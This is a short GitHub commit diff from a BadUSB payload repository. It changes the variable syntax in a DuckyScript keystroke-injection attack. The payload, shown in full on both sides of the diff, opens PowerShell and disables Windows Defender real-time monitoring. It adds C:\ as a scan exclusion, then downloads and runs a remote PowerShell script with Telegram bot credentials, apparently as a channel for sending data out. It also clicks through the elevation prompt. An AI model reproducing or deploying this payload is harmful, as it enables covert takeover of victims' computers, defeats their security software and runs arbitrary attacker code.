Fix for defining

pull/410/head
Mr. Proxy 2024-07-02 12:11:11 +02:00 committed by GitHub
parent 182556bc5b
commit c4aaea55be
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 4 deletions

View File

@ -9,16 +9,16 @@ REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
REM Remember you will have to host the powershell script yourself on any file sharing service (it has to be direct download link)
REM If you are using DropBox, just remember to change it from ?dl=0 top ?dl=1
DEFINE SCRIPT_URL example.com/payload.ps1?dl=1
DEFINE #SCRIPT_URL example.com/payload.ps1?dl=1
REM Here you will have to put your telegram bot details
DEFINE BOT_TOKEN your-bot-token
DEFINE CHAT_ID your-chat-id
DEFINE #BOT_TOKEN your-bot-token
DEFINE #CHAT_ID your-chat-id
DELAY 1500
GUI r
DELAY 500
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='BOT_TOKEN'; $ci='CHAT_ID'; irm SCRIPT_URL | iex'"
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='#BOT_TOKEN'; $ci='#CHAT_ID'; irm #SCRIPT_URL | iex'"
CTRL-SHIFT ENTER
DELAY 1000
ALT y